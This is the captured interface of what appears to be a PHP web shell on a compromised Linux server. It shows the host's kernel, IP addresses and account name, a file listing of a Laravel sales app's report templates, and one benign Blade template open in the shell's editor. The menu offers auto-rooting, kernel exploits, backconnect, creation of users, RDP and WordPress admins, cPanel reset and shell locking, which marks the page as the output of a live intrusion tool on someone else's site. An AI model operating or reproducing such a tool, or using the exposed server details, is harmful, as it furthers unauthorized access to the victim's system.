Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.13
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
.trash /
resources /
views /
reporte /
[ HOME SHELL ]
Name
Size
Permission
Action
baja.blade.php
2.37
KB
-rw-r--r--
compras.blade.php
3.1
KB
-rw-r--r--
comprobantes.blade.php
3.62
KB
-rw-r--r--
delivery.blade.php
2.36
KB
-rw-r--r--
detalles.blade.php
3.25
KB
-rw-r--r--
deudores.blade.php
2.99
KB
-rw-r--r--
egresos.blade.php
2.35
KB
-rw-r--r--
fabricados.blade.php
2.86
KB
-rw-r--r--
guia.blade.php
2.35
KB
-rw-r--r--
kardex.blade.php
3.03
KB
-rw-r--r--
operario.blade.php
2.87
KB
-rw-r--r--
pedidos.blade.php
2.34
KB
-rw-r--r--
productos_comprados.blade.php
2.37
KB
-rw-r--r--
productos_historial.blade.php
2.02
KB
-rw-r--r--
productos_personal.blade.php
3.6
KB
-rw-r--r--
productos_vencidos.blade.php
2.13
KB
-rw-r--r--
productos_vendidos.blade.php
3.76
KB
-rw-r--r--
sire.blade.php
3.68
KB
-rw-r--r--
stock.blade.php
1.49
KB
-rw-r--r--
tipo_impuesto.blade.php
3.01
KB
-rw-r--r--
usuarios.blade.php
8.11
KB
-rw-r--r--
ventas.blade.php
3.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : detalles.blade.php
@extends('layout.main') @section('content') <div class="sixteen wide tablet sixteen wide computer column "> <div class="ui segment"> <h4 class="ui dividing header teal centered">DETALLES DE VENTAS DE HOY POR PERSONAL</h4> <div class="ui success message"> <div class="ui equal width grid"> <div class="row" style="padding-bottom: 0px !important"> <div class="sixteen wide mobile seven wide tablet five wide computer column message_header">Nombre del Personal :</div> <div class="sixteen wide mobile nine wide tablet seven wide computer column">{{ ucwords(mb_strtolower($usuario->nombres)) }} {{ ucwords(mb_strtolower($usuario->apellidos)) }} ({{ $usuario->username }})</div> <div class="sixteen wide mobile seven wide tablet two wide computer column message_header">DNI :</div> <div class="sixteen wide mobile nine wide tablet two wide computer column">{{ $usuario->dni }}</div> </div> <div class="row" style="padding-bottom: 0px !important"> <div class="sixteen wide mobile seven wide tablet five wide computer column message_header">Total Vendido :</div> <div class="sixteen wide mobile nine wide tablet two wide computer column">S/ {{ $total != null ? $total : '0.00' }}</div> </div> </div> </div> <div class="ui hidden divider"></div> <table class="ui table"> <thead> <tr> <th class="center aligned">N°</th> <th class="center aligned">Local</th> <th class="center aligned">Cliente</th> <th class="center aligned">Comprobante</th> <th class="center aligned">Monto S/</th> <th class="center aligned">Fecha de Venta</th> <th class="center aligned">Tipo Pago</th> </tr> </thead> <tbody id="tbody"> <?php /**/ $i = 1 /**/ ?> @foreach ($data as $venta) <tr data-table="{{ $venta->id_venta }}"> <td>{{ $i }}</td> <td>{{ $venta->local->nombre }}</td> <td>{{ $venta->cliente->nombre }}</td> <td><a href="{{ url('venta/detalles/'.$venta->id_venta) }}" title="Clic para ver informacion">{{ $venta->nombre_comprobante }}</a></td> <td>{{ $venta->total_venta }}</td> <td>{{ $venta->created_at }}</td> <td>{{ $venta->tipo_pago }}</td> </tr> <?php /**/ $i++ /**/ ?> @endforeach </tbody> </table> <div class="form_footer" > <a class="ui small left floated default button" href="{{ URL::previous() }}"><i class="arrow left icon"></i>REGRESAR</a> </div> </div> </div> @stop
Close